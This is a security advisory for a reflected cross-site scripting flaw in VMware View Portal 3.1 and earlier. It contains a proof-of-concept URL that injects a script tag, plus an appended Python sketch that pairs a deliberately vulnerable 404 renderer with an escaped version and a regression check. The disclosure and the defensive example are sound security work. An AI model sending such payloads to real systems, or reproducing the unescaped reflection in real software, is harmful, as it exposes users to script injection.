[DSECRG-09-058] VMware View - XSS vulnerability

Source: http://www.dsecrg.com/pages/vul/show.php?id=158

Linked XSS in VMware Portal

Digital Security Research Group [DSecRG] Advisory DSECRG-09-058

Application: VMware View Portal
Versions Affected: <= 3.1
Vendor URL: http://www.vmware.com
Bugs: XSS
Exploits: YES
Reported: 07.09.2009
Vendor response: 21.09.2009
Date of Public Advisory: 05.05.2010
CVE: CVE-2010-1143
Author: Alexey Sintsov from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***********

Linked XSS in VMware Portal

Details
*******

An attacker may inject JavaScript code into the URL.

Example:
********

https://[VMware_Portal_IP]/not_a_real_page<SCRIPT>alert(/XSS/.source)</SCRIPT>

Solution
********

Update VMware View to version 3.1.3

References
**********

http://dsecrg.com/pages/vul/show.php?id=149
http://lists.vmware.com/pipermail/security-announce/2010/000092.html

About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.

Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
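Added example (not part of the DSecRG advisory and not VMware code): a sketch of the bug class shown in the Example section, where a "page not found" response echoes the requested path, next to the output-encoded form and a regression check. The template text and all function names are hypothetical; only the request path comes from the advisory.

```python
import html
from urllib.parse import quote, unquote

# Request path from the advisory's example URL (host part omitted).
ADVISORY_PATH = "/not_a_real_page<SCRIPT>alert(/XSS/.source)</SCRIPT>"
# The same path percent-encoded, as it may arrive on the wire.
ENCODED_PATH = quote(ADVISORY_PATH)

# Hypothetical error-page template; the real portal's markup is not on the page.
TEMPLATE = ("<html><body><h1>404 Not Found</h1>"
            "<p>The requested resource {} is not available.</p></body></html>")


def render_404_unsafe(raw_path: str) -> str:
    """Vulnerable pattern: the decoded path is written into HTML verbatim."""
    return TEMPLATE.format(unquote(raw_path))


def render_404_safe(raw_path: str) -> str:
    """Hardened pattern: decode first, then HTML-encode at the point of output."""
    return TEMPLATE.format(html.escape(unquote(raw_path), quote=True))


def reflects_markup(body: str, raw_path: str) -> bool:
    """Regression check: True if the decoded path reaches the body unencoded."""
    decoded = unquote(raw_path)
    return "<" in decoded and decoded in body


def audit(render) -> dict:
    """Run the check against both the literal and percent-encoded request path."""
    return {p: reflects_markup(render(p), p) for p in (ADVISORY_PATH, ENCODED_PATH)}


if __name__ == "__main__":
    print("unsafe handler reflects markup:", audit(render_404_unsafe))
    print("safe handler reflects markup:  ", audit(render_404_safe))
    print(render_404_safe(ADVISORY_PATH))
```

Encoding happens after URL decoding so that a percent-encoded request cannot bypass it; the same check can be kept as a regression test for any error page that reflects request data.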